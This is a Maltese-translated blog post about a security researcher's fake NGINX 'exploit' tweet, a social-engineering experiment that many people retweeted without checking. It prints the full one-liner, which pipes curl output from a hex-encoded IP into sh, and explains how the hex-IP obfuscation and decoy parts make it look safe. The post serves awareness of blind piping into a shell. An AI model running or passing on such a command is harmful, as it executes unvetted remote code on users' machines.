ProHoster > blog > Amministrazzjoni > Suċċess ta 'esperiment soċjali bi sfruttament nginx falz

Suċċess ta 'esperiment soċjali bi sfruttament nginx falz

Nota. transl.: Awtur nota oriġinali, ippubblikata fl-1 ta 'Ġunju, iddeċidiet li twettaq esperiment fost dawk interessati fis-sigurtà tal-informazzjoni. Biex jagħmel dan, huwa pprepara sfruttament falz għal vulnerabbiltà mhux żvelata fis-server tal-web u poġġih fuq Twitter tiegħu. Is-suppożizzjonijiet tiegħu - li jiġu esposti istantanjament minn speċjalisti li jaraw il-qerq ovvju fil-kodiċi - mhux biss ma sarux realtà... Huma qabżu l-aspettattivi kollha, u fid-direzzjoni opposta: it-tweet irċieva appoġġ kbir minn bosta nies li ma kinux. iċċekkja l-kontenut tiegħu.

Suċċess ta 'esperiment soċjali bi sfruttament nginx falz

TL; DR: Tużax file pipelining f'sh jew bash taħt l-ebda ċirkostanza. Dan huwa mod tajjeb ħafna biex titlef il-kontroll tal-kompjuter tiegħek.

Irrid naqsam magħkom storja qasira dwar exploit PoC komiku li nħoloq fil-31 ta' Mejju. Huwa deher fil-pront bi tweġiba għall-aħbarijiet minn Alisa Esage Shevchenko, Membru Inizjattiva ta ’Jum Żero (ZDI), dik l-informazzjoni dwar vulnerabbiltà f'NGINX li twassal għal RCE (eżekuzzjoni remota tal-kodiċi) dalwaqt tiġi żvelata. Peress li NGINX iħaddem ħafna websajts, l-aħbar trid tkun bomba. Iżda minħabba dewmien fil-proċess ta '"żvelar responsabbli", id-dettalji ta' dak li ġara ma kinux magħrufa - din hija proċedura ZDI standard.

Suċċess ta 'esperiment soċjali bi sfruttament nginx falz
Tweet dwar l-iżvelar tal-vulnerabbiltà f'NGINX

Wara li spiċċajt naħdem fuq teknika ġdida ta 'obfuscation fil-curl, ikkwotajt it-tweet oriġinali u "nixxejt PoC tax-xogħol" li jikkonsisti f'linja waħda ta' kodiċi li allegatament tisfrutta l-vulnerabbiltà skoperta. Naturalment, dan kien bla sens. Asssumi li se nkun espost immedjatament, u li fl-aħjar kont se nġib ftit retweets (oh well).

Suċċess ta 'esperiment soċjali bi sfruttament nginx falz
Tweet ma jisfruttaw foloz

Madankollu, ma stajtx nimmaġina x’ġara wara. Il-popolarità tat-tweet tiegħi żdiedet. B'mod sorprendenti, bħalissa (15:00 ħin ta 'Moska 1 ta' Ġunju) ftit nies indunaw li dan huwa falz. Ħafna nies jirrettjawha mingħajr ma jiċċekkjawha (ħaseb u ara jammiraw il-grafika sabiħa ASCII li toħroġ).

Suċċess ta 'esperiment soċjali bi sfruttament nginx falz
Ħares kemm hu sabiħ!

Filwaqt li dawn il-linji u l-kuluri kollha huma kbar, huwa ċar li n-nies kellhom imexxu l-kodiċi fuq il-magna tagħhom biex jarawhom. Fortunatament, il-browsers jaħdmu bl-istess mod, u flimkien mal-fatt li ma ridtx verament nidħol f'inkwiet legali, il-kodiċi midfun fis-sit tiegħi kien biss jagħmel sejħiet ta 'eku mingħajr ma pprova jinstalla jew jesegwixxi xi kodiċi addizzjonali.

Digressjoni żgħira: netspooky, dnz, jien u l-irġiel l-oħra mit-tim Thugfolla Ilna nilagħbu b’modi differenti kif njobbsu l-kmandi tal-curl għal xi żmien issa għax jibred... u aħna geeks. netspooky u dnz skoprew diversi metodi ġodda li dehru estremament promettenti għalija. ingħaqadt fil-gost u ppruvajt inżid konverżjonijiet deċimali IP mal-borża ta 'tricks. Jirriżulta li l-IP jista 'wkoll jiġi kkonvertit f'format eżadeċimali. Barra minn hekk, curl u l-biċċa l-kbira tal-għodda NIX oħra kuntenti jieklu IPs eżadeċimali! Għalhekk kienet biss kwistjoni li tinħoloq linja ta 'kmand konvinċenti u li tħares sigura. Fl-aħħar mill-aħħar iddeċidejt fuq dan:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

L-inġinerija soċjo-elettronika (S.E.E.) hija aktar minn sempliċi phishing

Is-sigurtà u l-familjarità kienu parti kbira minn dan l-esperiment. Naħseb li huma dawk li wasslu għas-suċċess tiegħu. Il-linja tal-kmand kienet timplika b'mod ċar is-sigurtà billi tirreferi għal "127.0.0.1" (il-localhost magħruf). Localhost huwa meqjus sigur u d-data fuqha qatt ma tħalli l-kompjuter tiegħek.

Il-familjarità kienet it-tieni komponent ewlieni ta 'S.E.E. ta' l-esperiment. Peress li l-udjenza fil-mira kienet tikkonsisti primarjament minn nies familjari mal-baŜi tas-sigurtà tal-kompjuter, kien importanti li jinħoloq kodiċi sabiex partijiet minnu dehru familjari u familjari (u għalhekk sikuri). Is-self ta' elementi ta' kunċetti ta' sfruttament qodma u l-kombinazzjoni tagħhom b'mod mhux tas-soltu wera li kien ta' suċċess kbir.

Hawn taħt hawn analiżi dettaljata tal-one-liner. Kollox fuq din il-lista jilbes natura kożmetika, u prattikament xejn mhu meħtieġ għall-operat attwali tiegħu.

Liema komponenti huma verament meħtieġa? Dan -gsS, -O 0x0238f06a, |sh u l-web server innifsu. Is-server tal-web ma kien fih l-ebda struzzjonijiet malizzjużi, iżda sempliċement serva grafika ASCII bl-użu ta 'kmandi echo fl-iskrittura li tinsab fi index.html. Meta l-utent daħal linja ma |sh fin-nofs, index.html mgħobbija u esegwita. Fortunatament, il-kustodji tas-server tal-web ma kellhom l-ebda intenzjoni ħażina.

  • ../../../%00 — tirrappreżenta li tmur lil hinn mid-direttorju;
  • ngx_stream_module.so — mogħdija għal modulu NGINX każwali;
  • /bin/sh%00<'protocol:TCP' - suppost qed inniedu /bin/sh fuq il-magna fil-mira u tidderieġi l-output lejn il-kanal TCP;
  • -O 0x0238f06a#PLToffset - ingredjent sigriet, supplimentat #PLToffset, biex tidher qisha offset tal-memorja b'xi mod li jinsab fil-PLT;
  • |sh; - framment ieħor importanti. Kellna nidderieġu l-output għal sh/bash sabiex inwettqu l-kodiċi li ġej mis-server tal-web li jattakka li jinsab fi 0x0238f06a (2.56.240.x);
  • nc /dev/tcp/localhost - manikin li fih jirreferi għal netcat /dev/tcp/localhostsabiex kollox jidher sikur mill-ġdid. Fil-fatt, ma jagħmel xejn u huwa inkluż fil-linja għas-sbuħija.

Dan jikkonkludi d-dekodifikazzjoni tal-iskrittura b'linja waħda u d-diskussjoni ta 'aspetti ta' "inġinerija soċjo-elettronika" (phishing ikkomplikat).

Konfigurazzjoni Web Server u Kontromiżuri

Peress li l-maġġoranza l-kbira tal-abbonati tiegħi huma infosec/hackers, iddeċidejt li nagħmel is-server tal-web ftit aktar reżistenti għall-espressjonijiet ta '"interess" min-naħa tagħhom, biss sabiex il-guys ikollhom xi ħaġa x'jagħmlu (u jkun pjaċevoli li mwaqqfa). Mhux se nsemmi n-nases kollha hawn peress li l-esperiment għadu għaddej, iżda hawn ftit affarijiet li jagħmel is-server:

  • Tissorvelja b'mod attiv it-tentattivi ta' distribuzzjoni fuq ċerti netwerks soċjali u tissostitwixxi diversi thumbnails ta' preview biex tħeġġeġ lill-utent biex ikklikkja fuq il-link.
  • Tidderieġi mill-ġdid Chrome/Mozilla/Safari/eċċ għall-vidjo promozzjonali Thugcrowd minflok ma juri l-iskript tal-qoxra.
  • Arloġġi għal sinjali OVVI ta 'intrużjoni/hacking sfaċċat, u mbagħad jibda tidderieġi talbiet għal servers NSA (ha!).
  • Jinstalla Trojan, kif ukoll rootkit BIOS, fuq il-kompjuters kollha li l-utenti tagħhom iżuru l-host minn browser regolari (kidding!).

Suċċess ta 'esperiment soċjali bi sfruttament nginx falz
Parti żgħira ta 'antimeri

F'dan il-każ, l-uniku għan tiegħi kien li nikkontrolla xi wħud mill-karatteristiċi ta 'Apache - b'mod partikolari, ir-regoli friski għar-ridirezzjoni tar-rikjesti - u ħsibt: għaliex le?

NGINX Exploit (Reali!)

Abbona għal @alisaesage fuq Twitter u segwi x-xogħol kbir ta 'ZDI fl-indirizzar ta' vulnerabbiltajiet reali ħafna u jisfrutta f'NGINX. Ix-xogħol tagħhom dejjem affaxxinatni u jien grat lil Alice għall-paċenzja tagħha bl-aċċennijiet u n-notifiki kollha li kkawża t-tweet stupid tiegħi. Fortunatament, għamel xi ġid ukoll: għen biex titqajjem kuxjenza dwar il-vulnerabbiltajiet NGINX, kif ukoll problemi kkawżati minn abbuż ta 'curl.

Sors: www.habr.com

Żid kumment